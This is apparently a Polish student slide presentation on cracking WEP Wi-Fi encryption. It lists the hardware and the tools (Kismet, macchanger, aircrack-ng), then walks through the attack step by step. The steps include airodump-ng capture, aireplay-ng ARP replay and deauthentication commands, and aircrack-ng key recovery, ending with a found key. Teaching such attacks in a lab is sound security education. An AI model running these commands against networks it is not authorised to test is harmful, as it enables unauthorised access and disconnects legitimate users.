Łamanie zabezpieczeń WEP w sieci Wi-Fi Autorzy: Wojciech Giezek Paweł Guła
Co to jest siec Wi-Fi Klucz WEP Sprzęt i narzędzia Rodzaje ataków Plan prezentacji: Co to jest siec Wi-Fi Klucz WEP Sprzęt i narzędzia Rodzaje ataków
Wi-Fi Zestaw standardów do budowy bezprzewodowej sieci komputerowej. Standard Wi-Fi opiera się na IEEE 802.11.
WEP Protokół działający na zasadzie współdzielonego klucza szyfrującego o długości od 40 do 140 bitów i 24 bitowym wektorze inicjującym.
Sprzęt: średniej klasy notebook z bezprzewodową kartą sieciową Proxim Orinoco Gold (chipset Atheros) średniej klasy komputer PC z bezprzewodową kartą sieciową Edimax access point Netgear notebook: BackTrack Linux (wersja 2.0 beta) PC: Windows 2000 pakiet aircrack-ng uaktualniony do ostatniej wersji (0.7) driver pod Atherosa uaktualniony do ostatniej wersji (0.9.2.1)
Narzędzia: Macchanger – program do zmiany adresu MAC Kismet – wykrywanie i raportowanie informacji o sieci Aircrack-ng To grupa programów umożliwiających monitorowanie, sniffowanie, analizę sieci bezprzewodowych oraz łamanie WEPa. Podstawowymi binarkami są aircrack-ng (łamanie WEP oraz metodą bruteforce WPA), aireplay-ng (wstrzykiwanie pakietów), airodump-ng (pokazywanie informacji o sieci oraz zapisywanie przechwytywanych pakietów).
Macchanger
Kismet
Rodzaje ataków na siec Wi-Fi Klasyczny Chopchop z klientem i bez Fragment
Łamanie klucza WEP Włączamy ariodump-ng lub kismeta Szukamy kanału, SSID i Access pointa na, którym działa siec W nowym terminalu, programem airdump-ng nasłuchujemy na kanale –c11, przechwytujemy IV(--vs), i zapisujemy do pliku (-w zapis wep)
airodump-ng -c KANAL -w PLIK --ivs ath0
Włączono kolejne okienko Do sieci jest podłączony tylko jeden klient (00:0E:2E:8A:2B:DB) IV (#Data=13) musi wzrosnąc żeby włączyc aircrack-ng i zdobyc klucz
aireplay-ng --arpreplay -b MAC_AP -h MAC_CLIENT ath0 Włączenie programu aireplay-ng, jest to program bezobsługowy. Spowoduje przechwycenie większej liczby pakietów i wprowadzenia ich
aireplay-ng --deauth 5 -a MAC_AP -c MAC_CLIENT ath0 Właczenie w kolejnym terminalu Aireplaya do przyspieszenia ARPów co z kolei przyśpieszy pojawianie się IVs
Jeśli nasz atak był skuteczny - po chwili "zaskoczy" nasze drugie okienko czekające na ARPy:
Włączenie pierwszego okienka Liczba IVs rosnie( musi osiągnąc 150.000) Można w tym czasie rozpocząc lamanie klucza programem aircrack-ng a nasze pakiety dalej się zbierają
Zbieranie pakietów
aircrack-ng -n 64 -b MAC_AP PLIK.ivs Rozpoczecie łamania klucza WEP!!!
Łamanie klucza
Znalezienie klucza: 6d:6f:E4:08:41
Dziękujemy za uwagę.